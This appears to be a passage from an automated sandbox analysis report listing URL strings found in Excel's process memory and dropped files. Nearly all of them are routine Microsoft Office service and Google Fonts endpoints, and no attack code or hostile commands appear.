    Source: EXCEL.EXE, 00000001.00000002.579029622.0000000012CD0000.00000004.00000001.sdmpString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidp
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Josefin
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Roboto:ital
    Source: EXCEL.EXE, 00000001.00000003.383127221.0000000015BE4000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://graph.ppe.windows.net/-
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://graph.windows.net
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://graph.windows.net/
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.com7
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://hubble.officeapps.live.comn
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580437283.0000000012F52000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494575204.0000000012F4C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: EXCEL.EXE, 00000001.00000003.382505599.0000000013048000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580901025.0000000013048000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetryOfficeOnlineContenthttps://insertmedia.
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3ddI
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: EXCEL.EXE, 00000001.00000002.579029622.0000000012CD0000.00000004.00000001.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com:443/nexus/rules?Applic
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordDF
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordhttps://login.windows.net/co
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.comBearer
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.netRx
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://ocos-office365-s2s.msedge.net/abe
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://officeapps.live.com
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com$
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com.
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com2
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com6
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com8
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comL
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comP
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comZ
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comb
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comd
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comn
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comv
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comx
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://officesetup.getmicrosoftkey.coms
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities/sche
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesk
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://onedrive.live.com
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/embed?i
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com4
    Source: EXCEL.EXE, 00000001.00000003.382505599.0000000013048000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580901025.0000000013048000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comOneDriveLogUploadServicehttps://storage.live.com/clientlogs/uploadlocationM
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comed
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://osi.office.net
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netQ-
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netX-
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
